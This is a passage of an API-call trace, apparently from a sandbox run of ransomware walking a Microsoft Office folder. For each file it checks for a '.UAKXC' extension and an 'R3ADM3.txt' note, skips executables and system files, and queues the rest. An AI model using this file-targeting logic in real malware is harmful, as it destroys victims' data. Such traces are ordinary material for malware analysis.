ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xd4939000, ftLastWriteTime.dwHighDateTime=0x1ca911d, nFileSizeHigh=0x0, nFileSizeLow=0x17b80, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSOHEV.DLL", cAlternateFileName="")) returned 1 [0159.383] lstrcmpW (lpString1="MSOHEV.DLL", lpString2=".") returned 1 [0159.383] lstrcmpW (lpString1="MSOHEV.DLL", lpString2="..") returned 1 [0159.383] StrStrIW (lpFirst="MSOHEV.DLL", lpSrch=".UAKXC") returned 0x0 [0159.383] StrStrIW (lpFirst="MSOHEV.DLL", lpSrch=".exe") returned 0x0 [0159.383] StrStrIW (lpFirst="MSOHEV.DLL", lpSrch=".dll") returned=".DLL" [0159.383] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd4939000, ftCreationTime.dwHighDateTime=0x1ca911d, ftLastAccessTime.dwLowDateTime=0x58c7d970, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xd4939000, ftLastWriteTime.dwHighDateTime=0x1ca911d, nFileSizeHigh=0x0, nFileSizeLow=0x12d80, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSOHEVI.DLL", cAlternateFileName="")) returned 1 [0159.383] lstrcmpW (lpString1="MSOHEVI.DLL", lpString2=".") returned 1 [0159.383] lstrcmpW (lpString1="MSOHEVI.DLL", lpString2="..") returned 1 [0159.383] StrStrIW (lpFirst="MSOHEVI.DLL", lpSrch=".UAKXC") returned 0x0 [0159.383] StrStrIW (lpFirst="MSOHEVI.DLL", lpSrch=".exe") returned 0x0 [0159.383] StrStrIW (lpFirst="MSOHEVI.DLL", lpSrch=".dll") returned=".DLL" [0159.383] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1a159300, ftCreationTime.dwHighDateTime=0x1ca91da, ftLastAccessTime.dwLowDateTime=0x58c7d970, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x1a159300, ftLastWriteTime.dwHighDateTime=0x1ca91da, nFileSizeHigh=0x0, nFileSizeLow=0x15780, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSOHTMED.EXE", cAlternateFileName="")) returned 1 [0159.384] lstrcmpW (lpString1="MSOHTMED.EXE", lpString2=".") returned 1 [0159.384] lstrcmpW (lpString1="MSOHTMED.EXE", lpString2="..") returned 1 [0159.384] StrStrIW (lpFirst="MSOHTMED.EXE", lpSrch=".UAKXC") returned 0x0 [0159.384] StrStrIW (lpFirst="MSOHTMED.EXE", lpSrch=".exe") returned=".EXE" [0159.384] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfa94b500, ftCreationTime.dwHighDateTime=0x1caca29, ftLastAccessTime.dwLowDateTime=0x593a1b70, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xfa94b500, ftLastWriteTime.dwHighDateTime=0x1caca29, nFileSizeHigh=0x0, nFileSizeLow=0xa398, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSOSTYLE.DLL", cAlternateFileName="")) returned 1 [0159.384] lstrcmpW (lpString1="MSOSTYLE.DLL", lpString2=".") returned 1 [0159.384] lstrcmpW (lpString1="MSOSTYLE.DLL", lpString2="..") returned 1 [0159.384] StrStrIW (lpFirst="MSOSTYLE.DLL", lpSrch=".UAKXC") returned 0x0 [0159.384] StrStrIW (lpFirst="MSOSTYLE.DLL", lpSrch=".exe") returned 0x0 [0159.384] StrStrIW (lpFirst="MSOSTYLE.DLL", lpSrch=".dll") returned=".DLL" [0159.384] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7d58a800, ftCreationTime.dwHighDateTime=0x1cba06e, ftLastAccessTime.dwLowDateTime=0xd6297920, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x7d58a800, ftLastWriteTime.dwHighDateTime=0x1cba06e, nFileSizeHigh=0x0, nFileSizeLow=0xde180, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSOSYNC.EXE", cAlternateFileName="")) returned 1 [0159.384] lstrcmpW (lpString1="MSOSYNC.EXE", lpString2=".") returned 1 [0159.384] lstrcmpW (lpString1="MSOSYNC.EXE", lpString2="..") returned 1 [0159.384] StrStrIW (lpFirst="MSOSYNC.EXE", lpSrch=".UAKXC") returned 0x0 [0159.384] StrStrIW (lpFirst="MSOSYNC.EXE", lpSrch=".exe") returned=".EXE" [0159.384] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7d58a800, ftCreationTime.dwHighDateTime=0x1cba06e, ftLastAccessTime.dwLowDateTime=0xd62e3be0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x7d58a800, ftLastWriteTime.dwHighDateTime=0x1cba06e, nFileSizeHigh=0x0, nFileSizeLow=0x77978, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSOUC.EXE", cAlternateFileName="")) returned 1 [0159.384] lstrcmpW (lpString1="MSOUC.EXE", lpString2=".") returned 1 [0159.384] lstrcmpW (lpString1="MSOUC.EXE", lpString2="..") returned 1 [0159.384] StrStrIW (lpFirst="MSOUC.EXE", lpSrch=".UAKXC") returned 0x0 [0159.384] StrStrIW (lpFirst="MSOUC.EXE", lpSrch=".exe") returned=".EXE" [0159.384] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdd250400, ftCreationTime.dwHighDateTime=0x1cac9b3, ftLastAccessTime.dwLowDateTime=0x593c7cd0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xdd250400, ftLastWriteTime.dwHighDateTime=0x1cac9b3, nFileSizeHigh=0x0, nFileSizeLow=0x65d78, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSOUTL.OLB", cAlternateFileName="")) returned 1 [0159.384] lstrcmpW (lpString1="MSOUTL.OLB", lpString2=".") returned 1 [0159.384] lstrcmpW (lpString1="MSOUTL.OLB", lpString2="..") returned 1 [0159.384] StrStrIW (lpFirst="MSOUTL.OLB", lpSrch=".UAKXC") returned 0x0 [0159.384] StrStrIW (lpFirst="MSOUTL.OLB", lpSrch=".exe") returned 0x0 [0159.385] StrStrIW (lpFirst="MSOUTL.OLB", lpSrch=".dll") returned 0x0 [0159.385] StrStrIW (lpFirst="MSOUTL.OLB", lpSrch=".lnk") returned 0x0 [0159.385] StrStrIW (lpFirst="MSOUTL.OLB", lpSrch=".sys") returned 0x0 [0159.385] StrStrIW (lpFirst="MSOUTL.OLB", lpSrch=".msi") returned 0x0 [0159.385] StrStrIW (lpFirst="MSOUTL.OLB", lpSrch="R3ADM3.txt") returned 0x0 [0159.385] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0x77926b0 [0159.385] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec8a0 [0159.385] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec970 [0159.385] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x8e) returned 0xf34b80 [0159.385] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xda57df00, ftCreationTime.dwHighDateTime=0x1cba5d5, ftLastAccessTime.dwLowDateTime=0xd6309d40, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xda57df00, ftLastWriteTime.dwHighDateTime=0x1cba5d5, nFileSizeHigh=0x0, nFileSizeLow=0x45578, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSOUTLS.DLL", cAlternateFileName="")) returned 1 [0159.385] lstrcmpW (lpString1="MSOUTLS.DLL", lpString2=".") returned 1 [0159.385] lstrcmpW (lpString1="MSOUTLS.DLL", lpString2="..") returned 1 [0159.385] StrStrIW (lpFirst="MSOUTLS.DLL", lpSrch=".UAKXC") returned 0x0 [0159.385] StrStrIW (lpFirst="MSOUTLS.DLL", lpSrch=".exe") returned 0x0 [0159.385] StrStrIW (lpFirst="MSOUTLS.DLL", lpSrch=".dll") returned=".DLL" [0159.386] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x62f00800, ftCreationTime.dwHighDateTime=0x1caba23, ftLastAccessTime.dwLowDateTime=0xbde72640, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x62f00800, ftLastWriteTime.dwHighDateTime=0x1caba23, nFileSizeHigh=0x0, nFileSizeLow=0x11560, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSPJEVTS.DLL", cAlternateFileName="")) returned 1 [0159.386] lstrcmpW (lpString1="MSPJEVTS.DLL", lpString2=".") returned 1 [0159.386] lstrcmpW (lpString1="MSPJEVTS.DLL", lpString2="..") returned 1 [0159.386] StrStrIW (lpFirst="MSPJEVTS.DLL", lpSrch=".UAKXC") returned 0x0 [0159.386] StrStrIW (lpFirst="MSPJEVTS.DLL", lpSrch=".exe") returned 0x0 [0159.386] StrStrIW (lpFirst="MSPJEVTS.DLL", lpSrch=".dll") returned=".DLL" [0159.386] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcab1b00, ftCreationTime.dwHighDateTime=0x1cabea2, ftLastAccessTime.dwLowDateTime=0x593ede30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xcab1b00, ftLastWriteTime.dwHighDateTime=0x1cabea2, nFileSizeHigh=0x0, nFileSizeLow=0x62588, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSPPT.OLB", cAlternateFileName="")) returned 1 [0159.386] lstrcmpW (lpString1="MSPPT.OLB", lpString2=".") returned 1 [0159.386] lstrcmpW (lpString1="MSPPT.OLB", lpString2="..") returned 1 [0159.386] StrStrIW (lpFirst="MSPPT.OLB", lpSrch=".UAKXC") returned 0x0 [0159.386] StrStrIW (lpFirst="MSPPT.OLB", lpSrch=".exe") returned 0x0 [0159.386] StrStrIW (lpFirst="MSPPT.OLB", lpSrch=".dll") returned 0x0 [0159.386] StrStrIW (lpFirst="MSPPT.OLB", lpSrch=".lnk") returned 0x0 [0159.386] StrStrIW (lpFirst="MSPPT.OLB", lpSrch=".sys") returned 0x0 [0159.386] StrStrIW (lpFirst="MSPPT.OLB", lpSrch=".msi") returned 0x0 [0159.386] StrStrIW (lpFirst="MSPPT.OLB", lpSrch="R3ADM3.txt") returned 0x0 [0159.386] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0x77926d8 [0159.386] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec8a0 [0159.386] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec970 [0159.386] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x8e) returned 0xf34b80 [0159.386] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1570ec00, ftCreationTime.dwHighDateTime=0x1cbc479, ftLastAccessTime.dwLowDateTime=0xe57c63a0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x1570ec00, ftLastWriteTime.dwHighDateTime=0x1cbc479, nFileSizeHigh=0x0, nFileSizeLow=0xd65a0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSPRJ.OLB", cAlternateFileName="")) returned 1 [0159.386] lstrcmpW (lpString1="MSPRJ.OLB", lpString2=".") returned 1 [0159.386] lstrcmpW (lpString1="MSPRJ.OLB", lpString2="..") returned 1 [0159.387] StrStrIW (lpFirst="MSPRJ.OLB", lpSrch=".UAKXC") returned 0x0 [0159.387] StrStrIW (lpFirst="MSPRJ.OLB", lpSrch=".exe") returned 0x0 [0159.387] StrStrIW (lpFirst="MSPRJ.OLB", lpSrch=".dll") returned 0x0 [0159.387] StrStrIW (lpFirst="MSPRJ.OLB", lpSrch=".lnk") returned 0x0 [0159.387] StrStrIW (lpFirst="MSPRJ.OLB", lpSrch=".sys") returned 0x0 [0159.387] StrStrIW (lpFirst="MSPRJ.OLB", lpSrch=".msi") returned 0x0 [0159.387] StrStrIW (lpFirst="MSPRJ.OLB", lpSrch="R3ADM3.txt") returned 0x0 [0159.387] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0x7792700 [0159.387] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec8a0 [0159.387] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec970 [0159.387] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x8e) returned 0xf34b80 [0159.387] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4a6ae000, ftCreationTime.dwHighDateTime=0x1cba07f, ftLastAccessTime.dwLowDateTime=0xdac3c1c0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x4a6ae000, ftLastWriteTime.dwHighDateTime=0x1cba07f, nFileSizeHigh=0x0, nFileSizeLow=0x4e760, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="msproof7.dll", cAlternateFileName="")) returned 1 [0159.387] lstrcmpW (lpString1="msproof7.dll", lpString2=".") returned 1 [0159.387] lstrcmpW (lpString1="msproof7.dll", lpString2="..") returned 1 [0159.387] StrStrIW (lpFirst="msproof7.dll", lpSrch=".UAKXC") returned 0x0 [0159.387] StrStrIW (lpFirst="msproof7.dll", lpSrch=".exe") returned 0x0 [0159.387] StrStrIW (lpFirst="msproof7.dll", lpSrch=".dll") returned=".dll" [0159.387] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x324d2e00, ftCreationTime.dwHighDateTime=0x1caca25, ftLastAccessTime.dwLowDateTime=0x593ede30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x324d2e00, ftLastWriteTime.dwHighDateTime=0x1caca25, nFileSizeHigh=0x0, nFileSizeLow=0x1963b0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSPST32.DLL", cAlternateFileName="")) returned 1 [0159.387] lstrcmpW (lpString1="MSPST32.DLL", lpString2=".") returned 1 [0159.387] lstrcmpW (lpString1="MSPST32.DLL", lpString2="..") returned 1 [0159.387] StrStrIW (lpFirst="MSPST32.DLL", lpSrch=".UAKXC") returned 0x0 [0159.387] StrStrIW (lpFirst="MSPST32.DLL", lpSrch=".exe") returned 0x0 [0159.387] StrStrIW (lpFirst="MSPST32.DLL", lpSrch=".dll") returned=".DLL" [0159.387] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x83e01e00, ftCreationTime.dwHighDateTime=0x1cab8a8, ftLastAccessTime.dwLowDateTime=0x6a1356f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x83e01e00, ftLastWriteTime.dwHighDateTime=0x1cab8a8, nFileSizeHigh=0x0, nFileSizeLow=0xdb4b68, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSPUB.EXE", cAlternateFileName="")) returned 1 [0159.387] lstrcmpW (lpString1="MSPUB.EXE", lpString2=".") returned 1 [0159.387] lstrcmpW (lpString1="MSPUB.EXE", lpString2="..") returned 1 [0159.388] StrStrIW (lpFirst="MSPUB.EXE", lpSrch=".UAKXC") returned 0x0 [0159.388] StrStrIW (lpFirst="MSPUB.EXE", lpSrch=".exe") returned=".EXE" [0159.388] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5d978100, ftCreationTime.dwHighDateTime=0x1cab7c9, ftLastAccessTime.dwLowDateTime=0x59413f90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x5d978100, ftLastWriteTime.dwHighDateTime=0x1cab7c9, nFileSizeHigh=0x0, nFileSizeLow=0x4b7, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="mspub.exe.manifest", cAlternateFileName="MSPUBE~1.MAN")) returned 1 [0159.388] lstrcmpW (lpString1="mspub.exe.manifest", lpString2=".") returned 1 [0159.388] lstrcmpW (lpString1="mspub.exe.manifest", lpString2="..") returned 1 [0159.388] StrStrIW (lpFirst="mspub.exe.manifest", lpSrch=".UAKXC") returned 0x0 [0159.388] StrStrIW (lpFirst="mspub.exe.manifest", lpSrch=".exe") returned=".exe.manifest" [0159.388] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x33918f00, ftCreationTime.dwHighDateTime=0x1cab7c8, ftLastAccessTime.dwLowDateTime=0x59413f90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x33918f00, ftLastWriteTime.dwHighDateTime=0x1cab7c8, nFileSizeHigh=0x0, nFileSizeLow=0x3ff28, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSPUB.TLB", cAlternateFileName="")) returned 1 [0159.388] lstrcmpW (lpString1="MSPUB.TLB", lpString2=".") returned 1 [0159.388] lstrcmpW (lpString1="MSPUB.TLB", lpString2="..") returned 1 [0159.388] StrStrIW (lpFirst="MSPUB.TLB", lpSrch=".UAKXC") returned 0x0 [0159.388] StrStrIW (lpFirst="MSPUB.TLB", lpSrch=".exe") returned 0x0 [0159.388] StrStrIW (lpFirst="MSPUB.TLB", lpSrch=".dll") returned 0x0 [0159.388] StrStrIW (lpFirst="MSPUB.TLB", lpSrch=".lnk") returned 0x0 [0159.388] StrStrIW (lpFirst="MSPUB.TLB", lpSrch=".sys") returned 0x0 [0159.388] StrStrIW (lpFirst="MSPUB.TLB", lpSrch=".msi") returned 0x0 [0159.388] StrStrIW (lpFirst="MSPUB.TLB", lpSrch="R3ADM3.txt") returned 0x0 [0159.388] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0x7792728 [0159.388] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec8a0 [0159.388] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec970 [0159.388] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x8e) returned 0xf34b80 [0159.388] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32ad2d00, ftCreationTime.dwHighDateTime=0x1cab7c9, ftLastAccessTime.dwLowDateTime=0x5943a0f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x32ad2d00, ftLastWriteTime.dwHighDateTime=0x1cab7c9, nFileSizeHigh=0x0, nFileSizeLow=0xd1160, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSQRY32.EXE", cAlternateFileName="")) returned 1 [0159.388] lstrcmpW (lpString1="MSQRY32.EXE", lpString2=".") returned 1 [0159.388] lstrcmpW (lpString1="MSQRY32.EXE", lpString2="..") returned 1 [0159.388] StrStrIW (lpFirst="MSQRY32.EXE", lpSrch=".UAKXC") returned 0x0 [0159.389] StrStrIW (lpFirst="MSQRY32.EXE", lpSrch=".exe") returned=".EXE" [0159.389] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xadd30b00, ftCreationTime.dwHighDateTime=0x1cab7ea, ftLastAccessTime.dwLowDateTime=0x5a89bd50, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xadd30b00, ftLastWriteTime.dwHighDateTime=0x1cab7ea, nFileSizeHigh=0x0, nFileSizeLow=0x1e550, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSRTEDIT.DLL", cAlternateFileName="")) returned 1 [0159.389] lstrcmpW (lpString1="MSRTEDIT.DLL", lpString2=".") returned 1 [0159.389] lstrcmpW (lpString1="MSRTEDIT.DLL", lpString2="..") returned 1 [0159.389] StrStrIW (lpFirst="MSRTEDIT.DLL", lpSrch=".UAKXC") returned 0x0 [0159.389] StrStrIW (lpFirst="MSRTEDIT.DLL", lpSrch=".exe") returned 0x0 [0159.389] StrStrIW (lpFirst="MSRTEDIT.DLL", lpSrch=".dll") returned=".DLL" [0159.389] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x40dec00, ftCreationTime.dwHighDateTime=0x1cb7010, ftLastAccessTime.dwLowDateTime=0xcf055920, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x40dec00, ftLastWriteTime.dwHighDateTime=0x1cb7010, nFileSizeHigh=0x0, nFileSizeLow=0xff368, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSTORDB.EXE", cAlternateFileName="")) returned 1 [0159.389] lstrcmpW (lpString1="MSTORDB.EXE", lpString2=".") returned 1 [0159.389] lstrcmpW (lpString1="MSTORDB.EXE", lpString2="..") returned 1 [0159.389] StrStrIW (lpFirst="MSTORDB.EXE", lpSrch=".UAKXC") returned 0x0 [0159.389] StrStrIW (lpFirst="MSTORDB.EXE", lpSrch=".exe") returned=".EXE" [0159.389] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe7931a00, ftCreationTime.dwHighDateTime=0x1cab7c8, ftLastAccessTime.dwLowDateTime=0x59460250, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xe7931a00, ftLastWriteTime.dwHighDateTime=0x1cab7c8, nFileSizeHigh=0x0, nFileSizeLow=0x20158, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSTORE.EXE", cAlternateFileName="")) returned 1 [0159.389] lstrcmpW (lpString1="MSTORE.EXE", lpString2=".") returned 1 [0159.389] lstrcmpW (lpString1="MSTORE.EXE", lpString2="..") returned 1 [0159.389] StrStrIW (lpFirst="MSTORE.EXE", lpSrch=".UAKXC") returned 0x0 [0159.389] StrStrIW (lpFirst="MSTORE.EXE", lpSrch=".exe") returned=".EXE" [0159.389] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe8c44700, ftCreationTime.dwHighDateTime=0x1cab7c8, ftLastAccessTime.dwLowDateTime=0x6a28c350, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xe8c44700, ftLastWriteTime.dwHighDateTime=0x1cab7c8, nFileSizeHigh=0x0, nFileSizeLow=0x89b58, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSTORES.DLL", cAlternateFileName="")) returned 1 [0159.389] lstrcmpW (lpString1="MSTORES.DLL", lpString2=".") returned 1 [0159.389] lstrcmpW (lpString1="MSTORES.DLL", lpString2="..") returned 1 [0159.389] StrStrIW (lpFirst="MSTORES.DLL", lpSrch=".UAKXC") returned 0x0 [0159.389] StrStrIW (lpFirst="MSTORES.DLL", lpSrch=".exe") returned 0x0 [0159.389] StrStrIW (lpFirst="MSTORES.DLL", lpSrch=".dll") returned=".DLL" [0159.389] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd7466000, ftCreationTime.dwHighDateTime=0x1caccde, ftLastAccessTime.dwLowDateTime=0x6a2fe770, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xd7466000, ftLastWriteTime.dwHighDateTime=0x1caccde, nFileSizeHigh=0x0, nFileSizeLow=0xdc158, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSWORD.OLB", cAlternateFileName="")) returned 1 [0159.390] lstrcmpW (lpString1="MSWORD.OLB", lpString2=".") returned 1 [0159.390] lstrcmpW (lpString1="MSWORD.OLB", lpString2="..") returned 1 [0159.390] StrStrIW (lpFirst="MSWORD.OLB", lpSrch=".UAKXC") returned 0x0 [0159.390] StrStrIW (lpFirst="MSWORD.OLB", lpSrch=".exe") returned 0x0 [0159.390] StrStrIW (lpFirst="MSWORD.OLB", lpSrch=".dll") returned 0x0 [0159.390] StrStrIW (lpFirst="MSWORD.OLB", lpSrch=".lnk") returned 0x0 [0159.390] StrStrIW (lpFirst="MSWORD.OLB", lpSrch=".sys") returned 0x0 [0159.390] StrStrIW (lpFirst="MSWORD.OLB", lpSrch=".msi") returned 0x0 [0159.390] StrStrIW (lpFirst="MSWORD.OLB", lpSrch="R3ADM3.txt") returned 0x0 [0159.390] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0x7792750 [0159.390] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec8a0 [0159.390] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec970 [0159.390] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x8e) returned 0xf34b80 [0159.390] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x633f6700, ftCreationTime.dwHighDateTime=0x1c9ce43, ftLastAccessTime.dwLowDateTime=0x6a3248d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x633f6700, ftLastWriteTime.dwHighDateTime=0x1c9ce43, nFileSizeHigh=0x0, nFileSizeLow=0x46530, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSYUBIN7.DLL", cAlternateFileName="")) returned 1 [0159.390] lstrcmpW (lpString1="MSYUBIN7.DLL", lpString2=".") returned 1 [0159.390] lstrcmpW (lpString1="MSYUBIN7.DLL", lpString2="..") returned 1 [0159.390] StrStrIW (lpFirst="MSYUBIN7.DLL", lpSrch=".UAKXC") returned 0x0 [0159.390] StrStrIW (lpFirst="MSYUBIN7.DLL", lpSrch=".exe") returned 0x0 [0159.390] StrStrIW (lpFirst="MSYUBIN7.DLL", lpSrch=".dll") returned=".DLL" [0159.390] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4e32200, ftCreationTime.dwHighDateTime=0x1c62ad6, ftLastAccessTime.dwLowDateTime=0x594ac510, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x4e32200, ftLastWriteTime.dwHighDateTime=0x1c62ad6, nFileSizeHigh=0x0, nFileSizeLow=0x1536, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MYSL.ICO", cAlternateFileName="")) returned 1 [0159.390] lstrcmpW (lpString1="MYSL.ICO", lpString2=".") returned 1 [0159.390] lstrcmpW (lpString1="MYSL.ICO", lpString2="..") returned 1 [0159.390] StrStrIW (lpFirst="MYSL.ICO", lpSrch=".UAKXC") returned 0x0 [0159.390] StrStrIW (lpFirst="MYSL.ICO", lpSrch=".exe") returned 0x0 [0159.390] StrStrIW (lpFirst="MYSL.ICO", lpSrch=".dll") returned 0x0 [0159.391] StrStrIW (lpFirst="MYSL.ICO", lpSrch=".lnk") returned 0x0 [0159.391] StrStrIW (lpFirst="MYSL.ICO", lpSrch=".sys") returned 0x0 [0159.391] StrStrIW (lpFirst="MYSL.ICO", lpSrch=".msi") returned 0x0 [0159.391] StrStrIW (lpFirst="MYSL.ICO", lpSrch="R3ADM3.txt") returned 0x0 [0159.391] RtlAllocateHeap 